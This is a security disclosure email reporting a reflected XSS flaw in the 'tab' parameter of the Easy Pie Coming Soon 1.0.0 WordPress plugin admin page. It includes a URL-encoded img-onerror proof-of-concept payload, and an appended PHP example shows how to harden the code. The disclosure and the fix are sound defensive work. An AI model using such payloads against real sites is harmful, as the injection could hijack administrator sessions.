Subject: Cross-Site Scripting (XSS) in Easy Pie Coming Soon 1.0.0
Date: Mon, 10 Aug 2015 18:22:26 +0200

Hello,

Plugin: Easy Pie Coming Soon 1.0.0 https://wordpress.org/plugins/easy-pie-coming-soon/

1. Cross-Site Scripting (XSS)

Authenticated administrators can inject HTML/JS code via the admin page (there is no CSRF protection on the request).

Method: GET
URL: http://localhost/wp-admin/admin.php?page=easy-pie-coming-soon&tab=[xss]
Vulnerable parameter: tab

Example PHP callstack:
/easy-pie-coming-soon/pages/page-options.php:33

Verification:
http://localhost/wp-admin/admin.php?page=easy-pie-coming-soon&tab=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

--
Regards,
Marcin Probola,
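As an added illustration (not the plugin's own source, which the report only references by file and line), the following hypothetical WordPress settings-page handler shows the unsafe reflection pattern the report describes beside a hardened version: the `tab` value is restricted to an allow-list, output is contextually escaped, and option changes require a capability check plus a nonce so cross-site requests are rejected. Function names prefixed `epcs_example_` and the tab identifiers are assumptions.

```php
<?php
// Added example, not the plugin's code. Unsafe pattern the report describes
// (hypothetical reconstruction): the query parameter is echoed straight into
// an HTML attribute, so a crafted link can close the attribute and add markup.
//   $tab = $_GET['tab'];
//   echo '<a href="?page=easy-pie-coming-soon&tab=' . $tab . '">';

// Hardened: resolve the current tab from an allow-list only.
function epcs_example_current_tab( array $get ): string {
    $allowed = array( 'general', 'design', 'advanced' ); // assumed tab names
    $tab     = isset( $get['tab'] ) ? sanitize_key( $get['tab'] ) : 'general';
    return in_array( $tab, $allowed, true ) ? $tab : 'general';
}

// Render the tab bar with contextual escaping for every dynamic value.
function epcs_example_render_tabs( string $current ): string {
    $html = '<h2 class="nav-tab-wrapper">';
    foreach ( array( 'general', 'design', 'advanced' ) as $tab ) {
        $url   = add_query_arg(
            array( 'page' => 'easy-pie-coming-soon', 'tab' => $tab ),
            admin_url( 'admin.php' )
        );
        $class = 'nav-tab' . ( $tab === $current ? ' nav-tab-active' : '' );
        $html .= sprintf(
            '<a href="%s" class="%s">%s</a>',
            esc_url( $url ),          // URL context
            esc_attr( $class ),       // attribute context
            esc_html( ucfirst( $tab ) ) // text context
        );
    }
    return $html . '</h2>';
}

// Settings form: emit a nonce so the save handler can reject forged requests.
function epcs_example_render_form(): void {
    echo '<form method="post">';
    wp_nonce_field( 'epcs_save_options', 'epcs_nonce' );
    // ... option fields go here ...
    submit_button();
    echo '</form>';
}

// Save handler: capability check plus nonce verification (CSRF protection).
function epcs_example_handle_save(): void {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    check_admin_referer( 'epcs_save_options', 'epcs_nonce' );
    // ... validate each posted field, then update_option() ...
}
```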